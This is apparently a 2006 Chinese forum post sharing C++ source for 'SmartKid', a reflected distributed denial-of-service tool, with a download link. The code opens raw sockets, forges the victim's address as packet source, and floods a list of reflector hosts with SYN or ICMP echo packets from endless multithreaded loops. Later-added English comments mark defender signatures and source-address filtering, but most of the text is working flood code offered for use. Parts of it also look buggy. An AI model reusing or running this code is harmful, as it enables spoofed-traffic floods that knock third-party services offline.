
智慧小子SmartKid drdos循环反射部分源代码


创建时间:2006-11-23
文章属性:原创
文章提交:swords (songbohr_at_163.com)

项目名称:智慧小子SmartKid

有了成果要公开, 不要舍不得,不然很快会过时的。。。:)
ICMP部分包构造感觉有问题,希望能得到反馈意见。

下载地址:http://www.dream2fly.net/projects/smartkid.rar
介绍地址:http://www.dream2fly.net/projects.php

#include "StdAfx.h"
#include "drdos.h"
#include <Afxmt.h>         //多线程头文件


/// Default constructor; the body is empty and no member is initialised here.
CDrdos::CDrdos(void)
{
}

/// Destructor; the body is empty, so nothing is released here.
CDrdos::~CDrdos(void)
{
}

// File-level state shared by every worker thread started from CDrdos::start().

// Reflector entries; the thread routines parse each one as "ip:port".
std::vector<CString> g_reflectlist;
static const int SleepTimes=10;     ///< Pause passed to Sleep() between thread creations (0.01 s)
static CCriticalSection Tlock;     ///< Critical section; syn_drdosthread takes it around its pass over g_reflectlist

// A single raw socket and a single destination address per mode.
static SOCKET     sock;
static SOCKADDR_IN syn_in;
static SOCKADDR_IN icmp_in;

// Header templates: filled once by InitSynPacket / InitIcmpPacket, then
// partly rewritten for every packet by the thread routines.
static IP_HEADER   ipheader;
static TCP_HEADER tcpheader;
static ICMP_HEADER icmpheader;
static PSD_HEADER psdheader;

/// Fills the shared IP, TCP and pseudo-header templates used by the SYN mode.
///
/// Source and destination address are both set from target_ip, and source and
/// destination port both from target_port. syn_drdosthread later overwrites
/// the destination fields with each reflector, so the packets that leave the
/// host carry the target's address and port as their source, i.e. a forged
/// source address.
///
/// NOTE(review): for defenders, the template leaves several fields constant
/// across all packets (TTL 255, frag_and_flags 0x40, SYN-only flags, window
/// 512, source port equal to the target's service port). Those constants are
/// what a network signature can key on. Forged-source packets of this kind
/// are dropped by networks that validate source addresses at the edge
/// (BCP 38 / RFC 2827).
///
/// @param target_ip    address written into both IP address fields (after htonl)
/// @param target_port  port written into both TCP port fields (after htons)
void CDrdos::InitSynPacket(const u_long &target_ip, const u_short &target_port)
{
  // Fill the IP header
  ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
  ipheader.tos=0;
  ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
  ipheader.ident=1;
  ipheader.frag_and_flags=0x40;   // presumably the Don't-Fragment bit; depends on the field layout in drdos.h
  ipheader.ttl=255;   // maximum
  ipheader.proto=IPPROTO_TCP;
  ipheader.checksum=0;
  ipheader.sourceIP=htonl(target_ip);   // source address is the target itself
  ipheader.destIP=htonl(target_ip);     // placeholder; replaced per reflector in syn_drdosthread

  // Fill the TCP header
  tcpheader.th_dport=htons(target_port);
  tcpheader.th_sport=htons(target_port);
  tcpheader.th_seq=htonl(rand());
  tcpheader.th_ack=0;
  tcpheader.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);
  tcpheader.th_flag=2; // SYN (00000010); change this value to probe with other flags: 2 is SYN, 1 is FIN, 16 is ACK
  tcpheader.th_win=htons(512);
  tcpheader.th_urp=0;
  tcpheader.th_sum=0;

  // Fill the TCP pseudo-header, which is used to compute the TCP checksum
  psdheader.saddr=ipheader.sourceIP;
  psdheader.daddr=ipheader.destIP;
  psdheader.mbz=0;
  psdheader.ptcl=IPPROTO_TCP;
  psdheader.tcpl=htons(sizeof(TCP_HEADER));
}

/// Fills the shared IP and ICMP header templates used by the ICMP mode.
///
/// As in InitSynPacket, both IP address fields are set from target_ip; the
/// destination is replaced per reflector in icmp_drdosthread, so the packets
/// carry the target's address as a forged source. The ICMP header is set to
/// type 8, code 0 (echo request). target_port is not used in this function.
///
/// NOTE(review): for defenders, the constant fields are TTL 255,
/// frag_and_flags 0x40 and an ICMP identifier taken from the sending
/// process id. Forged-source packets of this kind are dropped by networks
/// that validate source addresses at the edge (BCP 38 / RFC 2827).
///
/// @param target_ip    address written into both IP address fields (after htonl)
/// @param target_port  unused here
void CDrdos::InitIcmpPacket(const u_long &target_ip, const u_short &target_port)
{
  // Fill the IP header
  ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
  ipheader.tos=0;
  ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER));
  ipheader.ident=1;
  ipheader.frag_and_flags=0x40;   // presumably the Don't-Fragment bit; depends on the field layout in drdos.h
  ipheader.ttl=255;   // maximum
  ipheader.proto=IPPROTO_ICMP;
  ipheader.checksum=0;
  ipheader.sourceIP=htonl(target_ip);   // source address is the target itself
  ipheader.destIP=htonl(target_ip);     // placeholder; replaced per reflector in icmp_drdosthread

  // Fill the ICMP header
  icmpheader.ih_type=8;   // echo request
  icmpheader.ih_code=0;
  icmpheader.ih_cksum=0;
  icmpheader.ih_id=(USHORT)GetCurrentProcessId();
  icmpheader.ih_seq=htons(u_short(rand()));
  icmpheader.ih_timestamp=htonl(GetTickCount());
}

/// Worker thread routine for the SYN mode.
///
/// Loops without end over g_reflectlist. Each entry is split at the first ':'
/// into an address and a port; entries whose address inet_addr() rejects are
/// skipped. For every remaining entry the shared templates get a new
/// destination address and port, a new IP identification value and a new TCP
/// sequence number, the checksums are recomputed, and the packet is handed to
/// sendto() on the shared raw socket. There is no delay inside the loop.
///
/// NOTE(review): for defenders, only the destination, the IP ident and the
/// TCP sequence number vary from packet to packet. Everything else stays at
/// the values set in InitSynPacket, including the forged source address and
/// source port. On the reflector side this appears as unsolicited SYNs from
/// one source address/port pair; on the target side as unsolicited replies
/// from many hosts.
///
/// @param param  thread argument; not read by this routine
/// @return the WSAGetLastError() value if sendto() fails; the final
///         `return dwResult` is placed after a `while(true)` loop
DWORD CDrdos::syn_drdosthread(LPVOID param)
{
  DWORD dwResult=0;
  
  CString reflect_ip_port;
  u_long reflect_ip;
  u_short reflect_port;

  int randnum=0;   // counter handed to MakeRand32; cycles 0..2006
  while(true)
  {
    Tlock.Lock();
    for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
    {
        // Split the "ip:port" entry at the first colon.
        reflect_ip_port=*iter;
        int index=reflect_ip_port.Find (":",0);
        char *zombies_ip=new char[20];
        memcpy(zombies_ip,reflect_ip_port,index);
        zombies_ip[index]=0;
        if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
        {
          delete []zombies_ip;
          continue;   // skip invalid IP address
        }
        delete []zombies_ip;
        reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));

        if(randnum==2006)
        {
          randnum=0;
        }
        else
        {
          ++randnum;
        }
        u_long seq_num = MakeRand32(randnum);

        // Per-packet fields of the IP template.
        ipheader.destIP=reflect_ip;
        ipheader.ident = rand();
        ipheader.checksum = 0;

        // Per-packet fields of the TCP template.
        tcpheader.th_dport = htons(reflect_port);
        tcpheader.th_seq = htonl(seq_num);
        tcpheader.th_sum = 0;

        psdheader.daddr = ipheader.destIP;

        // Compute checksums
        char SendBuff[128]={0};

        // Compute the TCP checksum over pseudo-header + TCP header
        memcpy(SendBuff, &psdheader, sizeof(PSD_HEADER));
        memcpy(SendBuff+sizeof(PSD_HEADER), &tcpheader, sizeof(TCP_HEADER));
        tcpheader.th_sum=checksum((u_short *)SendBuff,sizeof(PSD_HEADER)+sizeof(TCP_HEADER));

        /////////
        // Compute the IP checksum
        memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
        memcpy(SendBuff+sizeof(IP_HEADER), &tcpheader, sizeof(TCP_HEADER));
        memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER),0,4);
        ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));

        syn_in.sin_family = AF_INET;
        syn_in.sin_addr.s_addr = reflect_ip;
        syn_in.sin_port = htons(reflect_port);

        // Send the packet
        int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&syn_in, sizeof(syn_in));
        if(ret==SOCKET_ERROR)
        {
          CString err;
          err.Format("错误号:%d\n\n请到http://www.dream2fly.net/forum提交这个错误号!\n\n您提交的意见将会在下版本中改进。",WSAGetLastError());
          MessageBox(NULL,err,"wrong",MB_OK);
          return WSAGetLastError();   // on XP SP2 raw socket send() fails with error 10004; XP SP2 does not support raw sockets
        }
    }
    Tlock.Unlock();
  }  

  return dwResult;
}

/// Worker thread routine for the ICMP mode.
///
/// Loops without end over g_reflectlist. Each entry is split at the first ':'
/// into an address and a port; entries whose address inet_addr() rejects are
/// skipped. For every remaining entry the shared templates get a new
/// destination address, IP identification value, ICMP sequence number and
/// timestamp, the checksums are recomputed, and the buffer is handed to
/// sendto() on the shared raw socket. There is no delay inside the loop, and
/// unlike syn_drdosthread this routine does not take Tlock (the calls are
/// commented out).
///
/// NOTE(review): for defenders, the packets are ICMP echo requests (type and
/// code come from InitIcmpPacket) carrying the target's address as a forged
/// source, with a constant ICMP identifier equal to the sender's process id.
/// On the target side this appears as unsolicited echo replies from many hosts.
///
/// @param param  thread argument; not read by this routine
/// @return the WSAGetLastError() value if sendto() fails; the final
///         `return dwResult` is placed after a `while(true)` loop
DWORD CDrdos::icmp_drdosthread(LPVOID param)
{
  DWORD dwResult=0;

  //Tlock.Lock();
  CString reflect_ip_port;
  u_long reflect_ip;
  u_short reflect_port;
  //Tlock.Unlock();

  int randnum=0;   // counter handed to MakeRand16; cycles 0..2006
  while(true)
  {
    for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
    {
        // Split the "ip:port" entry at the first colon.
        reflect_ip_port=*iter;
        int index=reflect_ip_port.Find (":",0);
        char *zombies_ip=new char[20];
        memcpy(zombies_ip,reflect_ip_port,index);
        zombies_ip[index]=0;
        if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
        {
          delete []zombies_ip;
          continue;   // skip invalid IP address
        }
        delete []zombies_ip;
        reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));

        if(randnum==2006)
        {
          randnum=0;
        }
        else
        {
          ++randnum;
        }
        u_short seq_num = MakeRand16(randnum);

        // Per-packet fields of the IP template.
        ipheader.destIP = reflect_ip;
        ipheader.ident = rand();
        ipheader.checksum = 0;

        // Per-packet fields of the ICMP template.
        icmpheader.ih_cksum=0;
        icmpheader.ih_id=(USHORT)GetCurrentProcessId();
        icmpheader.ih_seq=htons(seq_num);
        icmpheader.ih_timestamp=htonl(GetTickCount());

        // Compute the ICMP checksum
        icmpheader.ih_cksum=checksum((u_short *)&icmpheader,sizeof(ICMP_HEADER));

        char SendBuff[128]={0};
        // Compute the IP checksum
        memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
        memcpy(SendBuff+sizeof(IP_HEADER), &icmpheader, sizeof(ICMP_HEADER));
        ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));

        icmp_in.sin_family = AF_INET;
        icmp_in.sin_addr.s_addr =reflect_ip;
        icmp_in.sin_port = htons(reflect_port);


        // Send the packet
        int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&icmp_in, sizeof(icmp_in));
        if(ret==SOCKET_ERROR)
        {
          CString err;
          err.Format("错误号:%d\n\n请到http://www.dream2fly.net/forum提交这个错误号和您的操作系统版本!\n\n您提交的意见将会在下版本中改进。",WSAGetLastError());
          MessageBox(NULL,err,"wrong",MB_OK);
          return WSAGetLastError();   // on XP SP2 raw socket send() fails with error 10004; XP SP2 does not support raw sockets
        }
    }  
  }

  return dwResult;
}

/// Entry point: opens the raw socket, prepares the header templates for the
/// chosen mode, starts the worker threads and waits for them.
///
/// The socket is created as AF_INET / SOCK_RAW / IPPROTO_RAW and IP_HDRINCL is
/// enabled, so the program supplies its own IP header. That is what allows the
/// source address to be forged in InitSynPacket / InitIcmpPacket. Any
/// drdostype other than _SYN or _ICMP is treated as _SYN.
///
/// NOTE(review): for defenders, a user-mode process that opens a SOCK_RAW
/// socket and sets IP_HDRINCL is a host-side indicator worth alerting on.
/// The author's own comment in the thread routines records that Windows XP
/// SP2 rejects the send with error 10004.
///
/// @param threadnum     number of worker threads, stored in m_threadnum
/// @param drdostype     _SYN or _ICMP; selects the template and the thread routine
/// @param target_ip     passed through to the Init*Packet routine
/// @param target_port   passed through to the Init*Packet routine
/// @param reflect_list  copied into the global g_reflectlist
void CDrdos::start(const int threadnum,const link_type drdostype,const u_long &target_ip,const u_short &target_port,const std::vector<CString> &reflect_list)
{
  m_threadnum=threadnum;
  g_reflectlist=reflect_list;
  //sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
  sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
  if(sock ==INVALID_SOCKET)
  {
    MessageBox(NULL,"Init wrong!!submit bug?Go To http:///www.dream2fly.net !","wrong",MB_OK);
    return;
  }

  // IP_HDRINCL: the caller-built IP header is sent as-is.
  BOOL flag=true;
  int ret=setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag));
  checkerror(ret,"IP_HDRINCL");

  int nTimeOut =2000;//2s
  ret=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&nTimeOut,sizeof(nTimeOut));
  checkerror(ret,"SO_SNDTIMEO");
  ret=setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeOut,sizeof(nTimeOut));
  checkerror(ret,"SO_SNDTIMEO");   // the label passed here reads SO_SNDTIMEO although the option set above is SO_RCVTIMEO
  switch(drdostype)
  {
  case _SYN:
    {
        // Initialise the packet templates
        InitSynPacket(target_ip,target_port);
        break;
    }
  case _ICMP:
    {
        // Initialise the packet templates
        InitIcmpPacket(target_ip,target_port);
        break;
    }
  default:
    {
        // Initialise the packet templates
        InitSynPacket(target_ip,target_port);
        break;;
    }
  }

  // Start m_threadnum workers for the selected mode, SleepTimes ms apart.
  DWORD thread_ID=1;
  HANDLE *hDrdosThread =new HANDLE[m_threadnum];
  switch(drdostype)
  {
  case _SYN:
    {
        for(int i=0;i!=m_threadnum;++i)
        {
          hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)syn_drdosthread,NULL,0,&thread_ID);
          if(hDrdosThread==NULL)
          {
            MessageBox(NULL,"CreateThread error!","Error",MB_OK);
          }
          Sleep(SleepTimes);
          ++thread_ID;    
        }
        break;
    }
  case _ICMP:
    {
        for(int i=0;i!=m_threadnum;++i)
        {
          hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)icmp_drdosthread,NULL,0,&thread_ID);
          if(hDrdosThread==NULL)
          {
            MessageBox(NULL,"CreateThread error!","Error",MB_OK);
          }
          Sleep(SleepTimes);
          ++thread_ID;  
        }
        break;
    }
  default:
    {
        for(int i=0;i!=m_threadnum;++i)  
        {
          hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)syn_drdosthread,NULL,0,&thread_ID);
          if(hDrdosThread==NULL)
          {
            MessageBox(NULL,"CreateThread error!","Error",MB_OK);
          }
          Sleep(SleepTimes);
          ++thread_ID;    
        }
        break;
    }
  }

  // Block until the workers finish, then release their handles.
  DWORD WaitThread = WaitForMultipleObjects( m_threadnum , hDrdosThread , TRUE , INFINITE );
  if( WaitThread != WAIT_FAILED)
  {
    for( int n = 0 ; n != m_threadnum; ++n )
    {
        CloseHandle( hDrdosThread[n] );
    }
  }
  // Close the socket
  closesocket(sock);
}